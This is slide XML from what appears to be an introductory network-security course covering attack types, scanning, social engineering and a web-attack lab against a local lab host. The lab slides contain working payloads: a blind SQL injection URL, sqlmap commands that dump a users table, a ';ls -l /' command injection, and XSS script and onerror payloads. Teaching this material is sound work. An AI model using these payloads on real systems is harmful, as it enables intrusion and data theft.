            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://192.168.67.128/compiler/sql/id.php?id=1+and+1=if(substring(database(),2,1)='t',sleep(10),0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="692331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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162"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000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>A conﬁdentiality attack attempts to make “conﬁdential” data (such as personnel records, usernames, passwords, credit card numbers, and e-mails) viewable by an attacker.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="163" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2895480"/>
            <a:ext cx="5764680" cy="37335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smtClean="0"/>
              <a:t>11-Remote execution:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/rexec/index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : Enter hostname to ping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/rexec/index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Enter hostname to ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postfixed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>12-Cross-site scripting.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/xss/example1.php?name=ahmed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/xss/example1.php?name=&lt;script&gt;alert(1);&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/xss/example2.php?name=&lt;script&gt;alert(1);&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	http://192.168.67.128/compiler/xss/example2.php?name=ahmed+&lt;img </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>asd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=alert(1)&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398653502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1-burpsuite_free_v1.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2-SQL MAP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3-Nikto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4-Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5-GoogleDorks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6-WebCrowler (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HTTPTrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7-WebScarab (HTTP traffic interception)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37549130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attacks lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752600"/>
            <a:ext cx="8305800" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples with SQL MAP: - Need python 1.7 –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> python sqlmap.py -u  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/sql/id.php?id=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> python sqlmap.py -u  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/sql/id.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dbs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> python sqlmap.py -u  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/sql/id.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –tables –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>itidb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> python sqlmap.py -u  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.67.128/compiler/sql/id.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –dump –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>itidb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –T users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3265263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65"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Packet capture</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 packet-capture utility can capture packets visible by a PC’s network interface card (NIC) by placing the NIC in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>promiscuous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> mode.</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Some protocols (for example, Telnet and HTTP) are sent in plain text. Therefore, an attacker can read these types of captured packets, perhaps allowing him to see confidential information.</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Example: Wireshark, TCPdump</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67" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="438840" indent="-31968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Ping sweep</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-27396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 confidentiality attack might begin with a scan of network resources, to identify attack targets on a network. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-27396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 ping sweep could be used to ping a series of IP addresses. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-27396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Ping replies might indicate to an attacker that network resources can be reached at those IP addresses. </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69"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C00000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Port scan</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A potential target computer runs many 'services' that listen at ‘well-known’ 'ports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The attacker might scan a range of UDP and/or TCP ports to see what services are available on the host at the specified IP addresses.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Port Scanning Techniques:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Open scan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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Half- open scan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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SYN/ACK Scan </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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FIN Scan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>UDP Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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71"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Dumpster diving</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Because many companies throw away confidential information, without proper shredding, some attackers rummage through company dumpsters in hopes of discovering information that could be used to compromise network resources.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609600" y="206880"/>
            <a:ext cx="7772040" cy="1469520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Contents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1752480"/>
            <a:ext cx="8686800" cy="480072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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks and Vulnerabilities.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Vulnerabilities.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Type of hackers.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Categories of attacks.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Malicious hacker can do.</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Types of attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">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spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Security mechanisms.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </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Defense in depth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800280" lvl="1" indent="-342720">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Firewalls.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IDS/IPS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800280" lvl="1" indent="-342720">
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cryptography and Digital signatures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Lab : Firewall(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>firewalld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, Cryptography(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>openssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0" smtClean="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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1675745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73"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Social Engineering</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Attackers sometimes use social techniques (which often leverage people’s desire to be helpful) to obtain confidential information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Human-based Social Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Computer based Social Engineering </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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Confidentiality Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175"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C00000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Reverse Social Engineering</a:t>
